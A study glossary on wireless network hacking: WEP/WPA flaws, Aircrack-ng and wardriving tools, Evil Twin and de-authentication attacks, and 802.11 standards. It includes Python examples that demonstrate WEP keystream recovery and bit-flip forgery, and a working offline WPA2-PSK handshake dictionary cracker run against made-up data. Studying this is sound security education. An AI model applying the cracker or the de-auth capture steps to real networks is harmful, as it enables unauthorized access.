16. Hacking Wireless Networks


Authentication Attacks

PSK Cracking, LEAP Cracking, VPN Login Cracking, Domain Login Cracking, Key Reinstallation Attack (KRACK), Identity Theft, Shared Key Guessing, Password Speculation, Application Login Theft

Direct-sequence Spread Spectrum (DSSS)

Spread-spectrum technique that multiplies the original data signal by a pseudo-random noise spreading code, so the transmission occupies a wider band than the data alone would.

EAP

Extensible Authentication Protocol. An authentication framework that supports multiple authentication methods, such as token cards, Kerberos, and certificates.

AES

Advanced Encryption Standard. Symmetric block cipher used in WPA2 (through CCMP) as the replacement for TKIP.

Aircrack-ng Suite

www.aircrack-ng.org
Airbase-ng - multi-purpose tool for attacking clients; acts as a fake (or ad hoc) access point and can capture WPA/WPA2 handshakes
Aircrack-ng - the de facto WEP and WPA/WPA2-PSK cracking tool
Airdecap-ng - decrypts WEP/WPA/WPA2 captures and can strip the wireless headers from WiFi packets
Airdecloak-ng - removes WEP cloaking from a pcap file
Airdriver-ng - provides status information about the wireless drivers on your system
Airdrop-ng - targeted, rule-based de-authentication of users
Aireplay-ng - traffic generation, fake authentication, packet replay, and ARP request injection
Airgraph-ng - creates client-to-AP relationship and common-probe graphs from airodump-ng output
Airodump-ng - captures raw 802.11 frames and collects WEP IVs
Airolib-ng - stores and manages ESSID and password lists (precomputed PMKs) used in WPA/WPA2 cracking
Airserv-ng - allows multiple programs to independently use a WiFi card via a client-server TCP connection
Airmon-ng - switches wireless interfaces between managed mode and monitor mode
Airtun-ng - creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network
Easside-ng - communicates through a WEP-encrypted access point without knowing the WEP key
Packetforge-ng - creates encrypted packets that can subsequently be used for injection
Tkiptun-ng - injects frames into a WPA-TKIP network with QoS, and can recover the MIC key and keystream from WiFi traffic
Wesside-ng - combines a number of techniques to obtain a WEP key in minutes

WEP

Wired Equivalent Privacy. Encryption protocol for IEEE 802.11 wireless networks. It concatenates a 24-bit initialization vector (IV) with the shared key to seed the RC4 stream cipher for confidentiality, and uses a CRC-32 checksum (the ICV) for integrity of wireless transmissions.

802.11d

Amendment to 802.11a and 802.11b that adds support for regulatory domains (country information), so a device can operate within the rules of the country it is in. The particulars of this standard are handled at the media access control (MAC) layer.

Weak Initialization Vectors

1. WEP builds the per-packet RC4 key by prepending a 24-bit IV to the shared base key; the RC4 Key Scheduling Algorithm is seeded with IV || key.
2. The IV is too short, is not protected from reuse, and there is no protection against message replay.
3. A flaw in WEP's use of RC4 allows weak IVs (weak per-packet keys) to be generated.
4. The way the keystream is constructed from the IV makes it susceptible to weak-key attacks.
5. Those weak IVs reveal information about the key bytes they were derived from.
6. There is no effective detection of message tampering.
7. An attacker collects enough weak IVs to reveal bytes of the base key.
8. WEP uses the master key directly and has no built-in provision to update keys.

Discover WiFi Networks Using Wardriving

1. Register with WiGLE and download map packs for your area to view the plotted access points on a geographic map.
2. Connect the antenna and GPS device to the laptop via a USB serial adapter and board a car.
3. Install and launch NetStumbler and the WiGLE client software, and turn on the GPS device.
4. Drive at 35 mph or below (at higher speeds the WiFi antenna will not be able to detect WiFi spots).
5. Capture and save the NetStumbler log file, which contains the GPS coordinates of the access points.
6. Upload this log file to WiGLE, which will then automatically plot the points onto a map.

TKIP

Temporal Key Integrity Protocol. A security protocol used in WPA as a replacement for WEP; it keeps RC4 but adds per-packet key mixing, a 48-bit IV/sequence counter and the Michael message integrity check.

Availability Attacks

Access Point Theft, Disassociation Attacks, EAP-Failure, Beacon Flood, Denial of Service, De-authenticate Flood, Routing Attacks, Authenticate Flood, ARP Cache Poisoning Attack, Power Saving Attacks, TKIP MIC Exploit

WiFi Traffic Analyzer Tools

AirMagnet Wifi Analyzer http://enterprise.netscout.com

Wifi USB Dongle: AirPcap

The AirPcap adapter captures full 802.11 data, management, and control frames that can be viewed in Wireshark for in-depth protocol dissection and analysis. The AirPcap software can be configured to decrypt WEP/WPA-encrypted frames when the key is supplied.

Wardriving Tools

Airbase-ng https://aircrack-ng.org, MacStumbler www.macstumbler.com, AirFart https://sourceforge.net, 802.11 Network Discovery Tools https://sourceforge.net, G-MoN https://play.google.com

GPS Mapping

Attackers create a map of discovered WiFi networks and build a database from the statistics collected by WiFi discovery tools. GPS is used to record the location of each discovered network, and the coordinates are uploaded to sites like WiGLE. Tools: WiGLE, Skyhook.

BSSID

Basic Service Set Identifier. The 48-bit MAC address of the access point's radio, which uniquely identifies the BSS (as opposed to the human-readable SSID).

Dipole Antenna

Bidirectional antenna, used to support client connections rather than site-to-site applications

WEP Issues

CRC-32 is not sufficient to ensure the cryptographic integrity of a packet: it is linear, so bits can be flipped and the checksum patched without the key.
IVs are only 24 bits.
Known-plaintext attacks.
Dictionary attacks.
Denial of service.
Eventually an attacker can construct a decryption table of reconstructed keystreams.
A lack of centralized key management makes it difficult to change WEP keys with any regularity.
The IV is a value used to randomize the keystream; each packet carries its own IV in the clear.
The standard does not require that each packet have a unique IV, so vendors use only a small part of the available 24-bit space.
RC4 was designed as a stream cipher keyed once per message; its keystream was never meant to be reused across multiple messages.
An attacker can construct a decryption table of reconstructed keystreams and use it to decrypt WEP packets in real time.
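As an added example (not part of this study set), the toy WEP implementation below reproduces two of these issues in code: keystream reuse when the 24-bit IV repeats, and a CRC-32 bit-flipping forgery that the receiver accepts. The 40-bit key, IV and frame contents are constructed for the demonstration.

```python
"""Toy WEP: IV reuse leaks plaintext, and CRC-32 lets an attacker forge frames.
Added illustrative code; key, IV and frame contents are constructed."""
import zlib

WEP_KEY = bytes.fromhex("0102030405")   # constructed 40-bit shared key
IV = bytes.fromhex("aabbcc")            # one of only 2^24 possible IVs


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key-scheduling (KSA) followed by keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP body = (plaintext || CRC-32 ICV) XOR RC4(IV || key).
    The IV travels in the clear; the per-packet RC4 key is IV || shared key."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    body = plaintext + icv
    return xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(iv: bytes, key: bytes, ciphertext: bytes):
    """Returns (plaintext, icv_ok) exactly as a receiving station would compute it."""
    body = xor(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    plaintext, icv = body[:-4], body[-4:]
    return plaintext, zlib.crc32(plaintext).to_bytes(4, "little") == icv


def recover_by_iv_reuse(iv, key, known_plaintext, secret_plaintext):
    """Issue 1: a repeated IV repeats the keystream, so C1 XOR C2 == P1 XOR P2.
    With one known plaintext the other is recovered without the key."""
    c1 = wep_encrypt(iv, key, known_plaintext)
    c2 = wep_encrypt(iv, key, secret_plaintext)
    n = min(len(known_plaintext), len(secret_plaintext))
    return xor(xor(c1, c2)[:n], known_plaintext[:n])


def forge_by_bit_flip(iv, key, plaintext, delta):
    """Issue 2: CRC-32 is linear, crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros),
    so the attacker XORs D into the ciphertext and a matching correction into
    the encrypted ICV. The forged frame passes the integrity check although
    the attacker never learns the key or the keystream."""
    assert len(delta) == len(plaintext)
    c = wep_encrypt(iv, key, plaintext)
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))).to_bytes(4, "little")
    forged = xor(c, delta + icv_delta)
    return wep_decrypt(iv, key, forged)   # what the receiver sees


if __name__ == "__main__":
    p1 = b"GET /index.html HTTP/1.0"      # constructed known plaintext
    p2 = b"secret:hunter2 is stored"      # constructed secret frame, same IV
    print(recover_by_iv_reuse(IV, WEP_KEY, p1, p2))
    amount, target = b"transfer 0100 dollars", b"transfer 9900 dollars"
    print(forge_by_bit_flip(IV, WEP_KEY, amount, xor(amount, target)))
```

The keystream-reuse function needs only two ciphertexts and one guessed plaintext; the forgery needs one ciphertext and nothing else, which is why CRC-32 is called out as inadequate for integrity and why WPA introduced a keyed MIC.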

WEP Cracking

Cain & Abel is a password recovery tool for Windows. Its WEP cracker implements statistical cracking and the PTW method for recovering WEP keys from captured IVs.

WPA Brute Forcing

Newer versions of Cain also ship routing-protocol monitors, authentication monitors and route extractors, dictionary and brute-force crackers for all common hashing algorithms and several specific authentication schemes, password/hash calculators, cryptanalysis attacks, password decoders, and some less common utilities related to network and system security.

Bluesmacking

DoS attack that floods a Bluetooth-enabled device with oversized or random packets (for example L2CAP ping), causing the device to crash.

Integrity Attacks

Data Frame Injection, WEP Injection, Bit-Flipping Attacks, Extensible AP Replay, Data Replay, Initialization Vector Replay Attacks, RADIUS Replay, Wireless Network Viruses

802.15.5

Defines mesh networking for WPANs, deployed in a full-mesh or partial-mesh topology. It covers network initialization, addressing, and unicasting.

Bluetooth Modes

Discoverable modes:
Discoverable - the device is visible to other Bluetooth-enabled devices.
Limited discoverable - the device is visible only for a limited period, a specific period, or during temporary conditions.
Non-discoverable - the device does not appear in the list during a Bluetooth device search.
Pairing modes:
Non-pairable mode - the device rejects pairing requests sent by any device.
Pairable mode - the device accepts a pairing request and establishes a connection with the requesting device.

Confidentiality Attacks

Eavesdropping, Traffic Analysis, Cracking WEP Key, Evil Twin AP, Honeypot Access Point, Session Hijacking, Masquerading, Man-in-the-Middle Attack

WEP/WPA Cracking Tools

Elcomsoft Wireless Security Auditor www.elcomsoft.com WepAttack http://wepattack.sourceforge.net Wesside-ng www.aircrack-ng.org

Launch Wireless Attacks: Evil Twin

An Evil Twin is a wireless AP that pretends to be a legitimate AP by using another network's name (SSID). The attacker sets up a rogue AP outside the corporate perimeter and lures users into signing into the wrong AP. Once associated, users may bypass enterprise security policies, giving the attacker access to network data. An Evil Twin can be configured with a common residential SSID, a hotspot SSID, or the SSID of the company's WLAN.

Types of Wireless Networks

Extension to a Wired Network, Multiple Access Points, LAN-to-LAN Wireless Network, 3G/4G Hotspot

De-authentication attack

Force a connected client to disconnect by sending spoofed de-authentication frames (for example with aireplay-ng), then capture the client's reconnection, which includes the WPA/WPA2 4-way handshake. The client usually re-authenticates within a few seconds. With the handshake captured, run an offline dictionary or brute-force attack on the passphrase, recomputing the PMK for each candidate and checking it against the handshake MIC.

Frequency-hopping spread spectrum FHSS

Also Frequency Hopping Code Division Multiple Access (FH-CDMA): a method of transmitting radio signals by rapidly switching the carrier among many frequency channels in a pseudo-random sequence known to both sender and receiver.

802.15.4 ZigBee

Low data rate and low complexity. ZigBee covers long distances by relaying data through a mesh network of short-range nodes. Its data rate is 250 kbit/s.

Wireless Traffic Analysis

Helps in determining the appropriate strategy for a successful attack. Attackers analyze a wireless network to determine the broadcast SSID, the presence of multiple access points, the possibility of recovering hidden SSIDs, the authentication method used, and the WLAN encryption algorithms. Attackers use WiFi packet-sniffing tools such as Wireshark, SteelCentral Packet Analyzer, OmniPeek Enterprise, and CommView for WiFi to capture and analyze the traffic of a target wireless network.

Service Set Identifier SSID

Human-readable text string with a maximum length of 32 bytes. The SSID is a token that identifies an 802.11 WiFi network; it acts as a single shared identifier between the access point and its clients. Security concerns arise when default values are not changed, as such units are easy to recognize and compromise. If the SSID of the network is changed, every host must be reconfigured with the new SSID. A non-secure access mode allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "any". The SSID remains secret only on closed networks with no activity, which is inconvenient for legitimate users; otherwise it is broadcast in beacons and probe responses.
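As an added example for the traffic-analysis and SSID cards above (not part of this study set), the parser below extracts the SSID, channel and RSN information element from a beacon frame body to decide whether a network is open, WEP/WPA1, or WPA2/WPA3, and which cipher and AKM it uses; it treats a blank or all-NUL SSID as hidden and stops cleanly on a truncated element. The beacon bytes are constructed here rather than captured, and only the frame body after the 24-byte MAC header is modelled.

```python
"""Beacon frame body parser: SSID, channel and RSN (cipher/AKM) summary.
Added illustrative code; the beacon contents are constructed, not captured."""
import struct

OUI_IEEE = b"\x00\x0f\xac"                 # suite selectors defined by 802.11i
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X/EAP", 2: "PSK", 8: "SAE"}
TAG_SSID, TAG_RATES, TAG_DS, TAG_RSN = 0, 1, 3, 48
CAP_PRIVACY = 0x0010                       # capability bit: WEP/WPA/WPA2 in use


def build_rsn_ie(group: int, pairwise, akms) -> bytes:
    """RSN IE: version, group suite, pairwise suite list, AKM list, capabilities."""
    body = struct.pack("<H", 1) + OUI_IEEE + bytes([group])
    body += struct.pack("<H", len(pairwise)) + b"".join(OUI_IEEE + bytes([c]) for c in pairwise)
    body += struct.pack("<H", len(akms)) + b"".join(OUI_IEEE + bytes([a]) for a in akms)
    body += struct.pack("<H", 0)
    return bytes([TAG_RSN, len(body)]) + body


def build_beacon_body(ssid: bytes, channel: int, rsn_ie: bytes = b"", privacy: bool = True) -> bytes:
    """Fixed fields (timestamp, interval, capability) followed by tagged IEs."""
    capability = 0x0001 | (CAP_PRIVACY if privacy else 0)   # ESS bit plus privacy
    fixed = struct.pack("<QHH", 0, 100, capability)
    ies = bytes([TAG_SSID, len(ssid)]) + ssid
    ies += bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    ies += bytes([TAG_DS, 1, channel])
    return fixed + ies + rsn_ie


def parse_ies(body: bytes) -> dict:
    """Walk the tag/length/value list; stop on a truncated element rather than
    reading past the end of the frame (malformed beacons are common in the wild)."""
    ies, off = {}, 12
    while off + 2 <= len(body):
        tag, length = body[off], body[off + 1]
        if off + 2 + length > len(body):
            break
        ies[tag] = body[off + 2:off + 2 + length]
        off += 2 + length
    return ies


def parse_rsn(ie: bytes) -> dict:
    def suite(off):
        return CIPHERS.get(ie[off + 3], "unknown") if ie[off:off + 3] == OUI_IEEE else "vendor"
    version, = struct.unpack_from("<H", ie, 0)
    n_pair, = struct.unpack_from("<H", ie, 6)
    pairwise = [suite(8 + 4 * i) for i in range(n_pair)]
    off = 8 + 4 * n_pair
    n_akm, = struct.unpack_from("<H", ie, off)
    akms = [AKMS.get(ie[off + 2 + 4 * i + 3], "unknown") for i in range(n_akm)]
    return {"version": version, "group": suite(2), "pairwise": pairwise, "akm": akms}


def summarize(body: bytes) -> dict:
    """What traffic analysis wants from one beacon: SSID (or hidden), channel, security."""
    ies = parse_ies(body)
    raw_ssid = ies.get(TAG_SSID, b"")
    hidden = len(raw_ssid) == 0 or raw_ssid == bytes(len(raw_ssid))   # empty or all-NUL
    capability, = struct.unpack_from("<H", body, 10)
    info = {
        "ssid": None if hidden else raw_ssid.decode("utf-8", "replace"),
        "hidden": hidden,
        "channel": ies[TAG_DS][0] if TAG_DS in ies else None,
        "privacy": bool(capability & CAP_PRIVACY),
    }
    if TAG_RSN in ies:
        info["rsn"] = parse_rsn(ies[TAG_RSN])
        info["security"] = "WPA2/WPA3 (RSN)"
    elif info["privacy"]:
        info["security"] = "WEP or WPA1 (privacy bit set, no RSN IE)"
    else:
        info["security"] = "open"
    return info


if __name__ == "__main__":
    beacon = build_beacon_body(b"CorpWiFi", 6, build_rsn_ie(4, [4], [2]))  # constructed
    print(summarize(beacon))
```

A hidden SSID only removes the name from beacons; it still appears in probe requests and responses when a client associates, which is the "possibility of recovering SSIDs" noted above. WPA1 advertises its parameters in a vendor-specific IE (OUI 00-50-F2) rather than the RSN IE, which this example does not parse.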

Wireless Standards

IEEE Standard 802.11 has evolved from a basic wireless extension of the wired LAN into a mature protocol family that supports enterprise authentication, strong encryption, and quality of service.

802.11i

The IEEE 802.11i amendment improves WLAN security by introducing new encryption protocols, TKIP and AES-CCMP, together with 802.1X-based key management.

802.16

IEEE 802.16 is a wireless communications standard designed to provide multiple physical layer and media access control options for broadband wireless access. Known as WiMAX.

802.11b

IEEE extended 802.11 with the 802.11b specification in 1999. It operates in the 2.4 GHz ISM band and supports bandwidth up to 11 Mbps.

802.11n

802.11n is a revision that enhances the earlier 802.11g standard with multiple-input multiple-output (MIMO) antennas. It works in both the 2.4 GHz and 5 GHz bands and uses OFDM. It is used for WiFi local-network transport.

802.11ad

Adds a new physical layer for 802.11 networks operating in the 60 GHz spectrum (also known as WiGig).

Bandwidth

Describes the amount of information that can be carried over a connection per unit time, i.e. the data transfer rate. Bandwidth is measured in bits per second.

RADIUS

Remote Authentication Dial-In User Service. A centralized authentication, authorization and accounting system; in WPA/WPA2-Enterprise the access point forwards EAP authentication to a RADIUS server.

LEAP

Lightweight EAP. A proprietary version of EAP developed by Cisco; its MS-CHAP-based challenge/response exchange is vulnerable to offline dictionary attacks.

PEAP

Protected EAP. A protocol that encapsulates EAP within an encrypted and authenticated Transport Layer Security (TLS) tunnel.

802.11i

It is an IEEE amendment that specifies security mechanism for 802.11 wireless networks

WPA

WiFi Protected Access. A wireless encryption protocol using TKIP and a message integrity check (MIC) to provide stronger encryption and authentication than WEP. WPA uses TKIP to eliminate the weaknesses of WEP by adding per-packet key mixing, message integrity checks, an extended initialization vector, and a re-keying mechanism.

802.11g

An extension of 802.11 that supports a maximum bandwidth of 54 Mbps using OFDM technology and uses the same 2.4 GHz band as 802.11b.

Parabolic Grid Antenna

Based on the principle of a satellite dish but without a solid backing. It can pick up WiFi signals from 10 miles or more.

802.11a

It is the second extension to the original 802.11 and it operates in the 5 GHz frequency band and supports bandwidth up to 54 Mbps by using OFDM.

IEEE 802.11e

Used for real-time applications such as voice, VoIP and video. It defines mechanisms to provide Quality of Service at Layer 2 of the reference model, the medium access control (MAC) layer.

Omnidirectional Antenna

It provides 360 degree horizontal radiation pattern. It is used in wireless base stations.

802.11ac

Provides a high-throughput network in the 5 GHz band, with gigabit-class data rates.

WiFI Sniffer

Kismet www.kismetwireless.net Tcpdump www.tcpdump.org SmartSniff www.nirsoft.net

802.15.1 Bluetooth

Mainly used for exchanging data over short distances on fixed and mobile devices. Works on a 2.4 GHz band.

Orthogonal Frequency-division Multiplexing

Method of digital modulation in which a signal at a chosen frequency is split into multiple carrier frequencies that are orthogonal to each other.

BlueSnif

Proof of concept code for a Bluetooth wardriving utility

Wireless Networks

Refers to wireless local area networks based on the IEEE 802.11 standard, which allow a device to access the network from anywhere within range of an access point.

Reflector Antennas

Reflector antennas are used to concentrate EM energy which is radiated or received at a focal point.

Bluebugging

Remotely accessing the Bluetooth enabled devices and using its features

RF Monitoring Tools

Sentry Edge II www.tek.com, Network Manager https://wiki.gnome.org, xosview http://xosview.sourceforge.net, CPRIAdvisor www.viavisolutions.com, sigX www.kratoscomms.com

SSID

Service Set Identifier. A unique identifier of up to 32 octets (commonly alphanumeric characters) given to a wireless local area network, which acts as the network's name on the air.

BluePrinting

The art of collecting information about Bluetooth-enabled devices such as manufacturer, device model and firmware version.

Perform Spectrum Analysis

Spectrum analysis of a wireless network helps an attacker actively monitor spectrum usage in a particular area and detect the signal of the target network. It lets the attacker measure the power of known and unknown signals across the spectrum. Attackers use spectrum analysis tools such as Ekahau Spectrum Analyzer to perform this analysis.

802.12

This standard (100VG-AnyLAN) manages media utilization using the demand priority protocol. Speed increases to 100 Mbps.

Directional Antenna

Used to broadcast and obtain radio waves from a single direction

WPA PSK

Uses a user-defined passphrase to derive the pairwise master key that seeds TKIP's per-packet keys. The per-packet keys themselves are not recoverable, but because the master key is derived only from the passphrase and SSID, a captured handshake lets an attacker brute-force the passphrase offline with a dictionary attack.

802.15

Defines the standards for wireless personal area networks (WPAN). It describes the specification for wireless connectivity with fixed or portable devices.

WEP/WPA Cracking Tool for Mobile

WIBR - WIFI BRUTEFORCE HACK https://auradesign.cz, WIFI WPS WPA TESTER https://play.google.com

WiFi Chalking Techniques

WarWalking - attackers walk around with WiFi-enabled laptops to detect open wireless networks
WarChalking - drawing symbols in public places to advertise open WiFi networks
WarFlying - attackers use drones to detect open wireless networks
WarDriving - attackers drive around with WiFi-enabled laptops to detect open wireless networks

Access Control Attacks

WarDriving, Rogue Access Points, MAC Spoofing, AP Misconfiguration, Ad Hoc Associations, Promiscuous Client, Client Mis-association, Unauthorized Association

Spectrum Analyzing Tools

Wi-Spy and Chanalyzer www.metageek.com AirMagnet Spectrum XT https://enterprise.netscout.com Cisco Spectrum Expert www.cisco.com USB Spectrum Analyzer www.tek.com

WiFi Hotspot Finder Tools

WiFi Finder, Homedale::WiFi/WLAN Monitor, Avast Wifi Finder, Open Wifi, Open Wifi Finder, Free WiFi Finder, Fing - Network Tools

802.11

The original 802.11 standard applies to wireless LANs and specifies FHSS or DSSS physical layers in the 2.4 GHz band at 1 or 2 Mbps. It allows an electronic device to connect to a network over a wireless connection.

Mobile-based Wifi discovery tools

WifiExplorer http://nutsaboutnets.com, Wifi Manager, OpenSignalMaps, Network Signal Info Pro, WifiFoFum, WiFinder

Wireless Security Layers

Wireless Signal Security, Connection Security, Device Security, Data Protection, Network Protection, End-user Protection

Raw Packet Capturing Tools

WirelessNetView https://nirsoft.net, PRTG Network Monitor https://www.paessler.com, Tcpdump www.tcpdump.org, RawCap www.netresec.com

Wifi Packet Sniffer

Wireshark with AirPcap, SteelCentral Packet Analyzer, OmniPeek Enterprise, CommView for WiFi

Yagi Antenna

A Yagi is a unidirectional antenna commonly used in communications for frequencies from 10 MHz up through the VHF and UHF bands.

Brute-Force WPA Keys

You can use tools such as aircrack-ng, aireplay-ng and KisMAC to brute-force WPA keys from a captured handshake.

OffLine Attack

You only have to be near the AP for a matter of seconds to capture the WPA/WPA2 authentication (4-way) handshake. Once the right packets are captured (the EAPOL-Key messages carrying the nonces and the MIC), you can crack the WPA key offline without any further interaction with the network.
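As an added example (not part of this study set, and not aircrack-ng's code), the script below carries out the offline step described in the de-authentication, WPA PSK and offline-attack cards: derive the PMK from each candidate passphrase and the SSID, expand the PTK from both MACs and both nonces, and check the EAPOL MIC from message 2 of the handshake. The handshake is constructed with a known passphrase so the attack runs end to end; the MACs, nonces and wordlist are made up.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.
Added illustrative code; handshake material and wordlist are constructed."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed tables (airolib-ng) are per-ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]          # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1-128 over the EAPOL frame."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Dictionary attack: recompute the MIC for each candidate and compare.
    No traffic is sent; everything needed came from the captured handshake."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed:
    EAPOL header, descriptor type 2, key info (version 2, pairwise, MIC bit),
    key length, replay counter, SNonce, IV, RSC, ID, MIC, key data length."""
    body = (bytes([2]) + struct.pack(">HHQ", 0x010A, 0, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body


def build_capture(ssid: str, passphrase: str) -> dict:
    """Simulate what a sniffer hands us after a de-auth forces a client to reconnect:
    ANonce from message 1, SNonce and MIC from message 2, plus both MAC addresses."""
    aa = bytes.fromhex("001122334455")                    # constructed AP BSSID
    spa = bytes.fromhex("66778899aabb")                   # constructed client MAC
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = build_msg2(snonce)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol_zeroed": eapol, "mic": eapol_mic(kck, eapol)}


WORDLIST = ["password", "letmein", "CorpWiFi2019", "correct horse battery", "12345678"]  # constructed

if __name__ == "__main__":
    cap = build_capture("CorpWiFi", "CorpWiFi2019")
    print(crack_psk(cap["ssid"], cap["aa"], cap["spa"], cap["anonce"], cap["snonce"],
                    cap["eapol_zeroed"], cap["mic"], WORDLIST))
```

The cost of the attack is dominated by the 4096-iteration PBKDF2 per candidate, which is the only thing standing between a captured handshake and a weak passphrase; this is why WPA2-Enterprise (per-user EAP credentials) and WPA3's SAE, which does not expose an offline-checkable value, are the defences rather than longer de-auth timeouts.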

Wifi Discovery Tools

inSSIDer Office www.metageek.com

WPA2 Enterprise

Integrates 802.1X/EAP authentication (against a RADIUS server) with WPA2 encryption, giving each user individual credentials instead of a shared passphrase.

CCMP

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. The AES-based encryption protocol used in WPA2 that provides both confidentiality and message integrity.

WPA2

An upgrade to WPA that uses AES with CCMP for wireless data encryption. It includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption mode with strong security.
